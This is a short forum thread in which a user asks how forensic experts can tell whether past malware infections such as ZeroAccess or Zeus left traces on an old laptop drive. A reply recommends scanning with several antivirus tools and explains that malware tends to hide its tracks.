Is it simple for co...
 
Notifications
Clear all

Is it simple for computer forensic experts to tell if certain malware infected a computer ?

2 Posts
2 Users
0 Likes
1,373 Views
(@kurt2121)
Posts: 43
Eminent Member
Topic starter
 

I’ll start off by saying I know next to nothing about this kind of stuff  

My mothers old laptop has a hidden partition at the end of the disk - something the TDSS malware was known for. Additionally there were folders or file system with all these  “ntunistall$$” titles only the ZeroAccess botnet created to my knowledge. (Backed up by antivirus software showing zeroacces. Kind of like unique footprints left behind

That got me thinking; does every major malware leave behind clues that you can say “aha! This was an infection caused by Zeus!”, for example? Even long after it’s been cleaned up with antivirus software?  I’d find it super interesting to go back through it and see what other kind of infections I could see. 

Let’s say I said to you- I’d like to see if this hard drive had a Zeus infection or a Zlob infection or a Torpig infection at one point in time, would you be able to say , yep, just look for this, this and this. I hope I’m making sense. 

 
Posted : 27/11/2020 7:40 pm
UnallocatedClusters
(@unallocatedclusters)
Posts: 577
Honorable Member
 

Have you tried running one or more antivirus tools against the hard drive contents?

Here is a relatively reliable and free to use anti-virus tool:  Immunet AntiVirus

Try running multiple anti-virus tools against the hard drive contents and see if you get any positive hits.

Generally speaking, malware will attempt to hide its tracks such as turning off Windows event logs, creating Base64 encoded persistence, etc., so identifying changes made to a computer by malware requires significant expertise and experience.  

 
Posted : 30/11/2020 9:40 pm
Share: